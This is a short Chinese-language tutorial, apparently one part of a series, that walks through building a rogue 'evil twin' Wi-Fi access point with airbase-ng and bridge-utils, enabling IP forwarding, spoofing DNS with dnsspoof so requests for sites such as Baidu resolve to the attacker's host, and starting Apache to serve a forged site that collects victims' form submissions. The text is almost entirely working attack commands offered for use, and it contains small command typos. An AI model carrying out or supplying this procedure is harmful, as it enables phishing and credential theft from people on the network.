第一步:进入Monitor 模式(前面几篇文章有说明)
第二步:伪造AP:
安装无线网卡桥接包 apt-get install bridge-utils
添加网桥 brctl addbr bridge
先把连接网络的网卡添加到网桥里面 brctl addif bridge eth0 #eth0 是已经连接网络的网卡,可以是有线网卡或者无线网卡
把自己伪造AP的无线网卡添加到网桥里面 brctl addif bridge at0 #at0 伪造AP的无线网卡
清除网卡的IP地址 ifconfig eth0 0.0.0.0 up
清除AP网卡的IP地址 ifconfig at0 0.0.0.0 up
给桥接接口分配IP地址 ifconfig bridge 192.168.1.10 up
添加网关 route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
启动IP转发 echo 1 > /proc/sys/net/ipv4/ip_forward
进行AP伪造:airbase-ng -c 11 --essid TP_LINK722 wla0mon # -c 指定信道 --essid 要伪造成的AP wlan0mon 使用的网卡
第三步:DNS欺骗
dnsspoof -i bridge -f dnsspoof.hosts #-i 使用欺骗的网桥 -f 进行欺骗 域名网址配置文件(该配置文件的格式可以参考
/usr/share/dsniff/dnsspoof.hosts) 例如: 192.168.1.110 www.baidu.com 把访问百度的请求转向本机伪造的地址
然后启动apach服务 apachet2ctl start
下面步骤就要伪造自己想要的网站,等用户填写信息提交表单: